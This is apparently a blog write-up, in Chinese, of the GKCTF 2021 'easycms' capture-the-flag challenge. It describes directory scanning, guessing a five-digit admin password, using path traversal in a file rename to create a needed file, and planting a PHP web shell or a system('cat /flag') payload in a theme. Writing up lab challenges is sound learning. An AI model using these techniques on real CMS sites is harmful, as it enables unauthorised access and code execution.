# [GKCTF 2021]easycms

dirsearch 扫目录发现 admin.php 进入后台登录页面

猜 admin 的 12345

因为首页的提示显示密码是五位数

这种 CMS,第一时间想到主题。

试了下主题可以导出,主题这里想导入需要创建这个文件

![1](…/images/NSS[GKCTF 2021]easycms/1.png)

所以要创建一个文件

/var/www/html/system/tmp/qgak.txt

在设计 - 组件 - 素材库里可以上传文件然后重命名

将名称换成

../../../../../../../../../../../../var/www/html/system/tmp/qgak

他会自动加.txt

直接在主题的高级里面加马(蚁剑连接)或者直接

<?php system('cat /flag'); ?>

最后就是主页展示:(这是在全局文件上改的)

![2](…/images/NSS[GKCTF 2021]easycms/2.png)

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal